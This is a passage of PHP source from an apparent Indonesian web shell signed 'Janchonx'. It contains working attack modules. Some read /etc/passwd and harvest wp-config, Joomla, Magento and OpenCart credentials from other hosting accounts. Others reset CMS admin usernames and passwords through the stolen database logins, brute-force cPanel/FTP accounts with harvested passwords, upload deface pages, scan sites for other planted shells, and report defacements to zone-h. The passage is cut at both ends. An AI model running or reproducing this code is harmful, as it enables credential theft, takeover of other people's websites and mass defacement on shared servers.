2867. "/home3/$user_chonx/public_html/wp/wp-config.php" => "WordPressWp",
2868. "/home3/$user_chonx/public_html/WP/wp-config.php" => "WordPressWP",
2869. "/home3/$user_chonx/public_html/portal/wp-config.php" => "WordPressPortal",
2870. "/home3/$user_chonx/public_html/PORTAL/wp-config.php" => "WordPressPortal",
2871. "/home3/$user_chonx/public_html/Portal/wp-config.php" => "WordPressPortal"
2872. );
2873. foreach($grab_config as $config => $nama_config) {
2874. $ambil_config = file_get_contents($config);
2875. if($ambil_config == '') {
2876. } else {
2877. $file_config = fopen("chonx_config/$user_chonx-$nama_config.txt","w");
2878. fputs($file_config,$ambil_config);
2879. }
2880. }
2881. }
2882. }
2883. echo "<center><a href='?dir=$dir/chonx_config'><font color=lime>Done</font></a></center>";
2884. }else{
2885.  
2886. echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
2887. echo file_get_contents('/etc/passwd');
2888. echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
2889. }
2890. } elseif($_GET['do'] == 'jumping') {
2891. $i = 0;
2892. echo "<pre><div class='margin: 5px auto;'>";
2893. $etc = fopen("/etc/passwd", "r");
2894. while($passwd = fgets($etc)) {
2895. if($passwd == '' || !$etc) {
2896. echo "<font color=red>Can't read /etc/passwd</font>";
2897. } else {
2898. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
2899. foreach($user_jumping[1] as $user_idx_jump) {
2900. $user_jumping_dir = "/home/$user_idx_jump/public_html";
2901. if(is_readable($user_jumping_dir)) {
2902. $i++;
2903. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
2904. if(is_writable($user_jumping_dir)) {
2905. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
2906. }
2907. echo $jrw;
2908. $domain_jump = file_get_contents("/etc/named.conf");
2909. if($domain_jump == '') {
2910. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
2911. } else {
2912. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
2913. foreach($domains_jump[1] as $dj) {
2914. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
2915. $user_jumping_url = $user_jumping_url['name'];
2916. if($user_jumping_url == $user_idx_jump) {
2917. echo " => ( <u>$dj</u> )<br>";
2918. break;
2919. }
2920. }
2921. }
2922. }
2923. }
2924. }
2925. }
2926. if($i == 0) {
2927. } else {
2928. echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
2929. }
2930. echo "</div></pre>";
2931. } elseif($_GET['do'] == 'auto_edit_user') {
2932. if($_POST['hajar']) {
2933. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
2934. echo "username atau password harus lebih dari 6 karakter";
2935. } else {
2936. $user_baru = $_POST['user_baru'];
2937. $pass_baru = md5($_POST['pass_baru']);
2938. $conf = $_POST['config_dir'];
2939. $scan_conf = scandir($conf);
2940. foreach($scan_conf as $file_conf) {
2941. if(!is_file("$conf/$file_conf")) continue;
2942. $config = file_get_contents("$conf/$file_conf");
2943. if(preg_match("/JConfig|joomla/",$config)) {
2944. $dbhost = ambilkata($config,"host = '","'");
2945. $dbuser = ambilkata($config,"user = '","'");
2946. $dbpass = ambilkata($config,"password = '","'");
2947. $dbname = ambilkata($config,"db = '","'");
2948. $dbprefix = ambilkata($config,"dbprefix = '","'");
2949. $prefix = $dbprefix."users";
2950. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2951. $db = mysql_select_db($dbname);
2952. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2953. $result = mysql_fetch_array($q);
2954. $id = $result['id'];
2955. $site = ambilkata($config,"sitename = '","'");
2956. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
2957. echo "Config => ".$file_conf."<br>";
2958. echo "CMS => Joomla<br>";
2959. if($site == '') {
2960. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
2961. } else {
2962. echo "Sitename => $site<br>";
2963. }
2964. if(!$update OR !$conn OR !$db) {
2965. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2966. } else {
2967. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2968. }
2969. mysql_close($conn);
2970. } elseif(preg_match("/WordPress/",$config)) {
2971. $dbhost = ambilkata($config,"DB_HOST', '","'");
2972. $dbuser = ambilkata($config,"DB_USER', '","'");
2973. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2974. $dbname = ambilkata($config,"DB_NAME', '","'");
2975. $dbprefix = ambilkata($config,"table_prefix = '","'");
2976. $prefix = $dbprefix."users";
2977. $option = $dbprefix."options";
2978. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2979. $db = mysql_select_db($dbname);
2980. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2981. $result = mysql_fetch_array($q);
2982. $id = $result[ID];
2983. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2984. $result2 = mysql_fetch_array($q2);
2985. $target = $result2[option_value];
2986. if($target == '') {
2987. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2988. } else {
2989. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
2990. }
2991. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
2992. echo "Config => ".$file_conf."<br>";
2993. echo "CMS => Wordpress<br>";
2994. echo $url_target;
2995. if(!$update OR !$conn OR !$db) {
2996. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2997. } else {
2998. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2999. }
3000. mysql_close($conn);
3001. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
3002. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
3003. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
3004. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
3005. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
3006. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
3007. $prefix = $dbprefix."admin_user";
3008. $option = $dbprefix."core_config_data";
3009. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3010. $db = mysql_select_db($dbname);
3011. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
3012. $result = mysql_fetch_array($q);
3013. $id = $result[user_id];
3014. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
3015. $result2 = mysql_fetch_array($q2);
3016. $target = $result2[value];
3017. if($target == '') {
3018. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
3019. } else {
3020. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
3021. }
3022. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
3023. echo "Config => ".$file_conf."<br>";
3024. echo "CMS => Magento<br>";
3025. echo $url_target;
3026. if(!$update OR !$conn OR !$db) {
3027. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
3028. } else {
3029. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3030. }
3031. mysql_close($conn);
3032. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
3033. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
3034. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
3035. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
3036. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
3037. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
3038. $prefix = $dbprefix."user";
3039. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3040. $db = mysql_select_db($dbname);
3041. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
3042. $result = mysql_fetch_array($q);
3043. $id = $result[user_id];
3044. $target = ambilkata($config,"HTTP_SERVER', '","'");
3045. if($target == '') {
3046. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
3047. } else {
3048. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
3049. }
3050. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
3051. echo "Config => ".$file_conf."<br>";
3052. echo "CMS => OpenCart<br>";
3053. echo $url_target;
3054. if(!$update OR !$conn OR !$db) {
3055. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
3056. } else {
3057. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3058. }
3059. mysql_close($conn);
3060. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
3061. $dbhost = ambilkata($config,'server = "','"');
3062. $dbuser = ambilkata($config,'username = "','"');
3063. $dbpass = ambilkata($config,'password = "','"');
3064. $dbname = ambilkata($config,'database = "','"');
3065. $prefix = "users";
3066. $option = "identitas";
3067. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3068. $db = mysql_select_db($dbname);
3069. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
3070. $result = mysql_fetch_array($q);
3071. $target = $result[alamat_website];
3072. if($target == '') {
3073. $target2 = $result[url];
3074. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
3075. if($target2 == '') {
3076. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
3077. } else {
3078. $cek_login3 = file_get_contents("$target2/adminweb/");
3079. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
3080. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
3081. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
3082. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
3083. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
3084. } else {
3085. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
3086. }
3087. }
3088. } else {
3089. $cek_login = file_get_contents("$target/adminweb/");
3090. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
3091. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
3092. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
3093. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
3094. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
3095. } else {
3096. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
3097. }
3098. }
3099. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
3100. echo "Config => ".$file_conf."<br>";
3101. echo "CMS => Lokomedia<br>";
3102. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
3103. echo $url_target2;
3104. } else {
3105. echo $url_target;
3106. }
3107. if(!$update OR !$conn OR !$db) {
3108. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
3109. } else {
3110. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3111. }
3112. mysql_close($conn);
3113. }
3114. }
3115. }
3116. } else {
3117. echo "<center>
3118. <h1>Auto Edit User Config</h1>
3119. <form method='post'>
3120. DIR Config: <br>
3121. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
3122. Set User & Pass: <br>
3123. <input type='text' name='user_baru' value='achonx' placeholder='user_baru'><br>
3124. <input type='text' name='pass_baru' value='achonx' placeholder='pass_baru'><br>
3125. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
3126. </form>
3127. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
3128. ";
3129. }
3130. }elseif($_GET['do'] == 'shelscan') {
3131. echo'<center><h2>Shell Finder</h2>
3132. <form action="" method="post">
3133. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
3134. <br>
3135. <input name="scan" value="Start Scaning" style="width: 215px;" type="submit">
3136. </form><br>';
3137. if (isset($_POST["scan"])) {
3138. $url = $_POST['traget'];
3139. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
3140. echo "Result :<br />";
3141. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
3142. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
3143. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
3144. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
3145. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
3146. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
3147. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
3148. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
3149. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
3150. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
3151. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
3152. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
3153. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
3154. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
3155. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
3156. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
3157. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
3158. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
3159. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
3160. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
3161. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
3162. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
3163. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
3164. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
3165. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","chonx.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
3166. foreach ($shells as $shell){
3167. $headers = get_headers("$url$shell"); //
3168. if (eregi('200', $headers[0])) {
3169. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
3170. $dz = fopen('shells.txt', 'a+');
3171. $suck = "$url$shell";
3172. fwrite($dz, $suck."\n");
3173. }
3174. }
3175. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
3176. }
3177.  
3178. }
3179. elseif($_GET['do'] == 'cpanel') {
3180. if($_POST['crack']) {
3181. $usercp = explode("\r\n", $_POST['user_cp']);
3182. $passcp = explode("\r\n", $_POST['pass_cp']);
3183. $i = 0;
3184. foreach($usercp as $ucp) {
3185. foreach($passcp as $pcp) {
3186. if(@mysql_connect('localhost', $ucp, $pcp)) {
3187. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
3188. } else {
3189. $_SESSION[$ucp] = "1";
3190. $_SESSION[$pcp] = "1";
3191. $i++;
3192. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
3193. }
3194. }
3195. }
3196. }
3197. if($i == 0) {
3198. } else {
3199. echo "<br>Nemu ".$i." Cpanel by <font color=lime>Janchonx</font>";
3200. }
3201. } else {
3202. echo "<center>
3203. <form method='post'>
3204. USER: <br>
3205. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
3206. $_usercp = fopen("/etc/passwd","r");
3207. while($getu = fgets($_usercp)) {
3208. if($getu == '' || !$_usercp) {
3209. echo "<font color=red>Can't read /etc/passwd</font>";
3210. } else {
3211. preg_match_all("/(.*?):x:/", $getu, $u);
3212. foreach($u[1] as $user_cp) {
3213. if(is_dir("/home/$user_cp/public_html")) {
3214. echo "$user_cp\n";
3215. }
3216. }
3217. }
3218. }
3219. echo "</textarea><br>
3220. PASS: <br>
3221. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
3222. function cp_pass($dir) {
3223. $pass = "";
3224. $dira = scandir($dir);
3225. foreach($dira as $dirb) {
3226. if(!is_file("$dir/$dirb")) continue;
3227. $ambil = file_get_contents("$dir/$dirb");
3228. if(preg_match("/WordPress/", $ambil)) {
3229. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
3230. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
3231. $pass .= ambilkata($ambil,"password = '","'")."\n";
3232. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
3233. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
3234. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
3235. $pass .= ambilkata($ambil,'password = "','"')."\n";
3236. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
3237. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
3238. } elseif(preg_match("/client/", $ambil)) {
3239. preg_match("/password=(.*)/", $ambil, $pass1);
3240. if(preg_match('/"/', $pass1[1])) {
3241. $pass1[1] = str_replace('"', "", $pass1[1]);
3242. $pass .= $pass1[1]."\n";
3243. }
3244. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
3245. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
3246. }
3247. }
3248. echo $pass;
3249. }
3250. $cp_pass = cp_pass($dir);
3251. echo $cp_pass;
3252. echo "</textarea><br>
3253. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
3254. </form>
3255. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
3256. }
3257. } elseif($_GET['do'] == 'smtp') {
3258. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
3259. function scj($dir) {
3260. $dira = scandir($dir);
3261. foreach($dira as $dirb) {
3262. if(!is_file("$dir/$dirb")) continue;
3263. $ambil = file_get_contents("$dir/$dirb");
3264. $ambil = str_replace("$", "", $ambil);
3265. if(preg_match("/JConfig|joomla/", $ambil)) {
3266. $smtp_host = ambilkata($ambil,"smtphost = '","'");
3267. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
3268. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
3269. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
3270. $smtp_port = ambilkata($ambil,"smtpport = '","'");
3271. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
3272. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
3273. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
3274. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
3275. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
3276. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
3277. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
3278. }
3279. }
3280. }
3281. $smpt_hunter = scj($dir);
3282. echo $smpt_hunter;
3283. } elseif($_GET['do'] == 'auto_wp') {
3284. if($_POST['hajar']) {
3285. $title = htmlspecialchars($_POST['new_title']);
3286. $pn_title = str_replace(" ", "-", $title);
3287. if($_POST['cek_edit'] == "Y") {
3288. $script = $_POST['edit_content'];
3289. } else {
3290. $script = $title;
3291. }
3292. $conf = $_POST['config_dir'];
3293. $scan_conf = scandir($conf);
3294. foreach($scan_conf as $file_conf) {
3295. if(!is_file("$conf/$file_conf")) continue;
3296. $config = file_get_contents("$conf/$file_conf");
3297. if(preg_match("/WordPress/", $config)) {
3298. $dbhost = ambilkata($config,"DB_HOST', '","'");
3299. $dbuser = ambilkata($config,"DB_USER', '","'");
3300. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
3301. $dbname = ambilkata($config,"DB_NAME', '","'");
3302. $dbprefix = ambilkata($config,"table_prefix = '","'");
3303. $prefix = $dbprefix."posts";
3304. $option = $dbprefix."options";
3305. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3306. $db = mysql_select_db($dbname);
3307. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
3308. $result = mysql_fetch_array($q);
3309. $id = $result[ID];
3310. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
3311. $result2 = mysql_fetch_array($q2);
3312. $target = $result2[option_value];
3313. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
3314. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
3315. echo "<div style='margin: 5px auto;'>";
3316. if($target == '') {
3317. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
3318. } else {
3319. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
3320. }
3321. if(!$update OR !$conn OR !$db) {
3322. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
3323. } else {
3324. echo "<font color=lime>sukses di ganti.</font><br>";
3325. }
3326. echo "</div>";
3327. mysql_close($conn);
3328. }
3329. }
3330. } else {
3331. echo "<center>
3332. <h1>Auto Edit Title+Content WordPress</h1>
3333. <form method='post'>
3334. DIR Config: <br>
3335. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
3336. Set Title: <br>
3337. <input type='text' name='new_title' value='Hacked By Achon666ju5t' placeholder='New Title'><br><br>
3338. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
3339. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
3340. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
3341. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
3342. </form>
3343. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
3344. ";
3345. }
3346. } elseif($_GET['do'] == 'zoneh') {
3347. if($_POST['submit']) {
3348. $domain = explode("\r\n", $_POST['url']);
3349. $nick = $_POST['nick'];
3350. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
3351. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
3352. function zoneh($url,$nick) {
3353. $ch = curl_init("http://www.zone-h.com/notify/single");
3354. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
3355. curl_setopt($ch, CURLOPT_POST, true);
3356. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
3357. return curl_exec($ch);
3358. curl_close($ch);
3359. }
3360. foreach($domain as $url) {
3361. $zoneh = zoneh($url,$nick);
3362. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
3363. echo "$url -> <font color=lime>OK</font><br>";
3364. } else {
3365. echo "$url -> <font color=red>ERROR</font><br>";
3366. }
3367. }
3368. } else {
3369. echo "<center><form method='post'>
3370. <u>Defacer</u>: <br>
3371. <input type='text' name='nick' size='50' value='Achon666ju5t'><br>
3372. <u>Domains</u>: <br>
3373. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
3374. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
3375. </form>";
3376. }
3377. echo "</center>";
3378. }elseif($_GET['do'] == 'cpftp_auto') {
3379. if($_POST['crack']) {
3380. $usercp = explode("\r\n", $_POST['user_cp']);
3381. $passcp = explode("\r\n", $_POST['pass_cp']);
3382. $i = 0;
3383. foreach($usercp as $ucp) {
3384. foreach($passcp as $pcp) {
3385. if(@mysql_connect('localhost', $ucp, $pcp)) {
3386. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
3387. } else {
3388. $_SESSION[$ucp] = "1";
3389. $_SESSION[$pcp] = "1";
3390. if($ucp == '' || $pcp == '') {
3391. //
3392. } else {
3393. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
3394. $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
3395. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
3396. if((!$ftp_login) || (!$ftp_conn)) {
3397. echo "[+] <font color=red>Login Gagal</font><br><br>";
3398. } else {
3399. echo "[+] <font color=lime>Login Sukses</font><br>";
3400. $fi = htmlspecialchars($_POST['file_deface']);
3401. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
3402. if($deface) {
3403. $i++;
3404. echo "[+] <font color=lime>Deface Sukses</font><br>";
3405. if(function_exists('posix_getpwuid')) {
3406. $domain_cp = file_get_contents("/etc/named.conf");
3407. if($domain_cp == '') {
3408. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
3409. } else {
3410. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
3411. foreach($domains_cp[1] as $dj) {
3412. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
3413. $user_cp_url = $user_cp_url['name'];
3414. if($user_cp_url == $ucp) {
3415. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
3416. break;
3417. }
3418. }
3419. }
3420. } else {
3421. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
3422. }
3423. } else {
3424. echo "[-] <font color=red>Deface Gagal</font><br><br>";
3425. }
3426. }
3427. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
3428. }
3429. }
3430. }
3431. }
3432. }
3433. if($i == 0) {
3434. } else {
3435. echo "<br>Sukses Deface ".$i." Cpanel by <font color=lime>Janchonx.</font>";
3436. }
3437. } else {
3438. echo "<center>
3439. <form method='post'>
3440. Filename: <br>
3441. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
3442. Deface Page: <br>
3443. <input type='text' name='deface' placeholder='http://www.web-yang-udah-do-deface.com/filemu.php' style='width: 450px;'><br>
3444. USER: <br>
3445. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
3446. $_usercp = fopen("/etc/passwd","r");
3447. while($getu = fgets($_usercp)) {
3448. if($getu == '' || !$_usercp) {
3449. echo "<font color=red>Can't read /etc/passwd</font>";
3450. } else {
3451. preg_match_all("/(.*?):x:/", $getu, $u);
3452. foreach($u[1] as $user_cp) {
3453. if(is_dir("/home/$user_cp/public_html")) {
3454. echo "$user_cp\n";
3455. }
3456. }
3457. }
3458. }
3459. echo "</textarea><br>
3460. PASS: <br>
3461. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
3462. function cp_pass($dir) {
3463. $pass = "";
3464. $dira = scandir($dir);
3465. foreach($dira as $dirb) {
3466. if(!is_file("$dir/$dirb")) continue;
3467. $ambil = file_get_contents("$dir/$dirb");
3468. if(preg_match("/WordPress/", $ambil)) {
3469. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
